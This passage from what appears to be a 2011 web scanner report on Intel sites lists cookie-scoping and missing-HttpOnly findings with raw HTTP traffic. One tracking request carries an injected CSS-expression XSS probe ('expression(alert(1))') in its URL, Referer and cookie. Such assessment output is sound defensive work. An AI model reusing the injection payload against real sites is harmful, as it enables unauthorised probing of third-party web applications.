The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT
Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ
Connection: close


11.57. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1 HTTP/1.1
Accept: */*
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www91.intel.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=78E12C4CBC31892852D8659ED77D7E3B.node7IPR; wa_visitId=%7Bf2a84205-6e62-e72c-945c-67c55cb850af%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957489568; s_lv_s=First%20Visit; cf=1; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:57:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
Location: http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&pccr=true&vidn=26A7000A05012477-60000107200B4F69&&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1
X-C: ms-4.3.1
Expires: Sat, 05 Feb 2011 01:57:40 GMT
Last-Modified: Mon, 07 Feb 2011 01:57:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 0
Content-Type: text/plain


12. Cookie without HttpOnly flag set  previous  next
There are 159 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



12.1. http://appdeveloper.intel.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://appdeveloper.intel.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:17:40 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=99d10be2a8b5824058095ee73c009e9e; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...

12.2. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://appdeveloper.intel.com
Path:   /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:17:40 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...

12.3. http://communities.intel.com/community/openportit/server  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/server

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/openportit/server HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=C3BB5A4A6127C798AA423278CD19252D.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 876
Content-Language: en-US
CacheHit: D=884319 t=1296947757183516
X-JSL: D=884325 t=1296947757183516
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.4. http://communities.intel.com/community/openportit/vproexpert  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.5. http://communities.intel.com/community/tech  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=A6A7D75900DB7F9498266317E36D34BE.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 269
Content-Language: en-US
CacheHit: D=278002 t=1296947755835805
X-JSL: D=278007 t=1296947755835805
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.6. http://communities.intel.com/community/tech/desktop  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/tech/desktop HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=655258FED1C8CE54639970DB6AAC28EB.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:54 GMT; Path=/
X-JAL: 111
Content-Language: en-US
CacheHit: D=120980 t=1296947753199224
X-JSL: D=120985 t=1296947753199224
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.7. http://communities.intel.com/index.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.jspa HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=84414FB0E56F8779A8C027A76AA897B4.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 497
Content-Language: en-US
CacheHit: D=506181 t=1296947752876810
X-JSL: D=506186 t=1296947752876810
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.8. http://flesler.demos.com/jquery/scrollTo/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://flesler.demos.com
Path:   /jquery/scrollTo/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery/scrollTo/ HTTP/1.1
Host: flesler.demos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:59:27 GMT
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404 Not Found
Cache-Control: no-cache
Content-Length: 947
Set-Cookie: _display_manager_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--af8c11ce1971d13ddb232e31aa849f4ac245c1dc; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<
...[SNIP]...

12.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=E669082769D079AB1B6BB7D5060E305B.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=16105 t=1296956932351295
X-JSL: D=16111 t=1296956932351295
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 80219

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

12.10. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=033E5A52A6AE27B548A5D9EF6D8E5C5E.node6IPR; Domain=.intel.com; Path=/
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=12373 t=1296956932379103
X-JSL: D=12379 t=1296956932379103
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 49485

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

12.11. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; 